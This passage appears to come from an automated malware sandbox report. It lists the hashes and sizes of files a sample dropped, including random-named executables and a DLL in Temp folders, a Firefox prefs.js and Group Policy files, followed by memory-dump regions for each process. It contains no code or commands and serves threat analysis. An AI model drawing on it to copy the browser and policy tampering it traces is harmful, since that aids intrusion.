                                                                                                                                                                              Filesize

                                                                                                                                                                              60B

                                                                                                                                                                              MD5

                                                                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                              SHA1

                                                                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                              SHA256

                                                                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                              SHA512

                                                                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\SNvmPmIhBpGbmlc\bSZuSHX.exe

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                              MD5

                                                                                                                                                                              a52dabfd55a6a04633ac83693b0a4177

                                                                                                                                                                              SHA1

                                                                                                                                                                              184c0c38f9ae941f2adbf47ef1f3be362926ad22

                                                                                                                                                                              SHA256

                                                                                                                                                                              bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe

                                                                                                                                                                              SHA512

                                                                                                                                                                              5de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\SNvmPmIhBpGbmlc\bSZuSHX.exe

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                              MD5

                                                                                                                                                                              a52dabfd55a6a04633ac83693b0a4177

                                                                                                                                                                              SHA1

                                                                                                                                                                              184c0c38f9ae941f2adbf47ef1f3be362926ad22

                                                                                                                                                                              SHA256

                                                                                                                                                                              bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe

                                                                                                                                                                              SHA512

                                                                                                                                                                              5de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12

                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3zxqty5.default-release\prefs.js

                                                                                                                                                                              Filesize

                                                                                                                                                                              7KB

                                                                                                                                                                              MD5

                                                                                                                                                                              10e3087620fe67d476f034e313dc4559

                                                                                                                                                                              SHA1

                                                                                                                                                                              e7bbb7cc099533a89374992f9ba2dbf76a6e89cd

                                                                                                                                                                              SHA256

                                                                                                                                                                              95e6acdd1bf589894919394b1a9a709f45fc56d2c486fcc6ece7db7832d5eb1c

                                                                                                                                                                              SHA512

                                                                                                                                                                              6c6b2cf9e3248021ca3c83bcc4484deb3c60fa744787253a404639dc147037fc49ff1de953cc35b8e14d6e9d6a8bd28058cfe171407d8e55ec51145343fb7190

                                                                                                                                                                            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                              Filesize

                                                                                                                                                                              1KB

                                                                                                                                                                              MD5

                                                                                                                                                                              33b19d75aa77114216dbc23f43b195e3

                                                                                                                                                                              SHA1

                                                                                                                                                                              36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                                                                                                                                              SHA256

                                                                                                                                                                              b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                                                                                                                                              SHA512

                                                                                                                                                                              676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                                                                                                                                            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                              Filesize

                                                                                                                                                                              11KB

                                                                                                                                                                              MD5

                                                                                                                                                                              16e738c00609d220bc5df483795558c7

                                                                                                                                                                              SHA1

                                                                                                                                                                              e0c741a2ec4c24e1a9b686df84fba487c48cba6d

                                                                                                                                                                              SHA256

                                                                                                                                                                              dea1f14cc7d2d517cb61e601e6b63803e1992d0f81a96c1d7e1c97e7276b8ca2

                                                                                                                                                                              SHA512

                                                                                                                                                                              1e274dadd2dd68bc5b6d152d07a98d614064a331c9df25dfa465c35c431685cb19295e9d3bf13ceb5b2b8072d33e6d97da97804a6ea1d92f40646c3c488dadb0

                                                                                                                                                                            • C:\Windows\Temp\qMfgxxkvaFNxVGCk\gAXPDAAA\JlGFjJW.dll

                                                                                                                                                                              Filesize

                                                                                                                                                                              6.1MB

                                                                                                                                                                              MD5

                                                                                                                                                                              d05c5e84c729a0c666eecfe14c936e36

                                                                                                                                                                              SHA1

                                                                                                                                                                              d34b7a17e1f20d68c2f50bfa7d3fcb9567272a0a

                                                                                                                                                                              SHA256

                                                                                                                                                                              6e915747e036eae54ec8d6866c3238c881c66bce6021bd35a21d9a3ae207f33d

                                                                                                                                                                              SHA512

                                                                                                                                                                              f2dd030f9359efde204f04777a0e066ea5dc0de575d1423fb6fb80a83edbbfae436369039dfcef2045758469e6674fdcaa761787828f5e81b070868b884eee4d

                                                                                                                                                                            • C:\Windows\Temp\qMfgxxkvaFNxVGCk\gAXPDAAA\JlGFjJW.dll

                                                                                                                                                                              Filesize

                                                                                                                                                                              6.1MB

                                                                                                                                                                              MD5

                                                                                                                                                                              d05c5e84c729a0c666eecfe14c936e36

                                                                                                                                                                              SHA1

                                                                                                                                                                              d34b7a17e1f20d68c2f50bfa7d3fcb9567272a0a

                                                                                                                                                                              SHA256

                                                                                                                                                                              6e915747e036eae54ec8d6866c3238c881c66bce6021bd35a21d9a3ae207f33d

                                                                                                                                                                              SHA512

                                                                                                                                                                              f2dd030f9359efde204f04777a0e066ea5dc0de575d1423fb6fb80a83edbbfae436369039dfcef2045758469e6674fdcaa761787828f5e81b070868b884eee4d

                                                                                                                                                                            • C:\Windows\Temp\qMfgxxkvaFNxVGCk\lXXVCSOPWGZMZyR\PdEQbdf.exe

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                              MD5

                                                                                                                                                                              a52dabfd55a6a04633ac83693b0a4177

                                                                                                                                                                              SHA1

                                                                                                                                                                              184c0c38f9ae941f2adbf47ef1f3be362926ad22

                                                                                                                                                                              SHA256

                                                                                                                                                                              bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe

                                                                                                                                                                              SHA512

                                                                                                                                                                              5de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12

                                                                                                                                                                            • C:\Windows\Temp\qMfgxxkvaFNxVGCk\lXXVCSOPWGZMZyR\PdEQbdf.exe

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                              MD5

                                                                                                                                                                              a52dabfd55a6a04633ac83693b0a4177

                                                                                                                                                                              SHA1

                                                                                                                                                                              184c0c38f9ae941f2adbf47ef1f3be362926ad22

                                                                                                                                                                              SHA256

                                                                                                                                                                              bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe

                                                                                                                                                                              SHA512

                                                                                                                                                                              5de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12

                                                                                                                                                                            • C:\Windows\Temp\qMfgxxkvaFNxVGCk\lXXVCSOPWGZMZyR\PdEQbdf.exe

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                              MD5

                                                                                                                                                                              a52dabfd55a6a04633ac83693b0a4177

                                                                                                                                                                              SHA1

                                                                                                                                                                              184c0c38f9ae941f2adbf47ef1f3be362926ad22

                                                                                                                                                                              SHA256

                                                                                                                                                                              bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe

                                                                                                                                                                              SHA512

                                                                                                                                                                              5de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12

                                                                                                                                                                            • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                                              Filesize

                                                                                                                                                                              6KB

                                                                                                                                                                              MD5

                                                                                                                                                                              fa8fcb288e10bb509cdc3593d9066250

                                                                                                                                                                              SHA1

                                                                                                                                                                              7391a8ba45767ece645140acab1cd3a26e01bc99

                                                                                                                                                                              SHA256

                                                                                                                                                                              ff2f87ba371e0f9c00374c174a5f9b523fbd01372a32ad8c1eb0b5f2168bd946

                                                                                                                                                                              SHA512

                                                                                                                                                                              7646da224726820cf816761780263c0c722e101a6dfec475114b68688b6d08a611cb6db844e21f7b9e2af2552106000bda1abd4fc6cf53613cc7e446b0375e21

                                                                                                                                                                            • C:\Windows\system32\GroupPolicy\gpt.ini

                                                                                                                                                                              Filesize

                                                                                                                                                                              268B

                                                                                                                                                                              MD5

                                                                                                                                                                              a62ce44a33f1c05fc2d340ea0ca118a4

                                                                                                                                                                              SHA1

                                                                                                                                                                              1f03eb4716015528f3de7f7674532c1345b2717d

                                                                                                                                                                              SHA256

                                                                                                                                                                              9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                                                                                                                              SHA512

                                                                                                                                                                              9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                                                                                                                            • memory/564-44-0x0000000003EE0000-0x0000000004508000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              6.2MB

                                                                                                                                                                            • memory/564-57-0x0000000004860000-0x0000000004BB4000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              3.3MB

                                                                                                                                                                            • memory/564-41-0x00000000013F0000-0x0000000001426000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              216KB

                                                                                                                                                                            • memory/564-42-0x00000000730E0000-0x0000000073890000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.7MB

                                                                                                                                                                            • memory/564-43-0x0000000001490000-0x00000000014A0000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/564-45-0x0000000003D50000-0x0000000003D72000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              136KB

                                                                                                                                                                            • memory/564-46-0x0000000004680000-0x00000000046E6000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              408KB

                                                                                                                                                                            • memory/564-52-0x00000000046F0000-0x0000000004756000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              408KB

                                                                                                                                                                            • memory/564-63-0x00000000730E0000-0x0000000073890000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.7MB

                                                                                                                                                                            • memory/564-60-0x0000000001490000-0x00000000014A0000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/564-59-0x0000000004D30000-0x0000000004D7C000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              304KB

                                                                                                                                                                            • memory/564-58-0x0000000004CE0000-0x0000000004CFE000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              120KB

                                                                                                                                                                            • memory/1060-12-0x0000000010000000-0x0000000010591000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              5.6MB

                                                                                                                                                                            • memory/1060-546-0x00000000008C0000-0x0000000000FBC000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                            • memory/1060-32-0x00000000008C0000-0x0000000000FBC000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                            • memory/1060-11-0x00000000008C0000-0x0000000000FBC000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                            • memory/1256-584-0x0000019FF46D0000-0x0000019FF46D1000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/1256-566-0x0000019FEC140000-0x0000019FEC150000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/1256-582-0x0000019FF46A0000-0x0000019FF46A1000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/1256-585-0x0000019FF46D0000-0x0000019FF46D1000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/1256-586-0x0000019FF46D0000-0x0000019FF46D1000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/1256-587-0x0000019FF46D0000-0x0000019FF46D1000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/1256-588-0x0000019FF46D0000-0x0000019FF46D1000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/1256-583-0x0000019FF46D0000-0x0000019FF46D1000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/1732-78-0x00000000730E0000-0x0000000073890000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.7MB

                                                                                                                                                                            • memory/1732-77-0x00000000038E0000-0x00000000038F0000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/1732-65-0x00000000730E0000-0x0000000073890000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.7MB

                                                                                                                                                                            • memory/3384-158-0x00000000030E0000-0x0000000003144000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              400KB

                                                                                                                                                                            • memory/3384-504-0x00000000038C0000-0x0000000003937000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              476KB

                                                                                                                                                                            • memory/3384-103-0x0000000000890000-0x0000000000F8C000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                            • memory/3384-116-0x00000000029D0000-0x0000000002A55000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              532KB

                                                                                                                                                                            • memory/3384-519-0x0000000003940000-0x00000000039F9000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              740KB

                                                                                                                                                                            • memory/3384-547-0x0000000000890000-0x0000000000F8C000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                            • memory/3384-105-0x0000000010000000-0x0000000010591000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              5.6MB

                                                                                                                                                                            • memory/4656-16-0x00007FFB5E9F0000-0x00007FFB5F4B1000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              10.8MB

                                                                                                                                                                            • memory/4656-17-0x0000029110720000-0x0000029110730000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/4656-18-0x0000029110720000-0x0000029110730000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/4656-28-0x000002912AC30000-0x000002912AC52000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              136KB

                                                                                                                                                                            • memory/4656-31-0x00007FFB5E9F0000-0x00007FFB5F4B1000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              10.8MB

                                                                                                                                                                            • memory/4788-37-0x0000000000FD0000-0x00000000016CC000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                            • memory/4788-38-0x0000000010000000-0x0000000010591000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              5.6MB

                                                                                                                                                                            • memory/4788-104-0x0000000000FD0000-0x00000000016CC000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                            • memory/4788-93-0x0000000000FD0000-0x00000000016CC000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                            • memory/4896-97-0x00007FFB5DD00000-0x00007FFB5E7C1000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              10.8MB

                                                                                                                                                                            • memory/4896-94-0x0000024180430000-0x0000024180440000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/4896-82-0x00007FFB5DD00000-0x00007FFB5E7C1000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              10.8MB

                                                                                                                                                                            • memory/5032-537-0x00000000016C0000-0x0000000001C51000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              5.6MB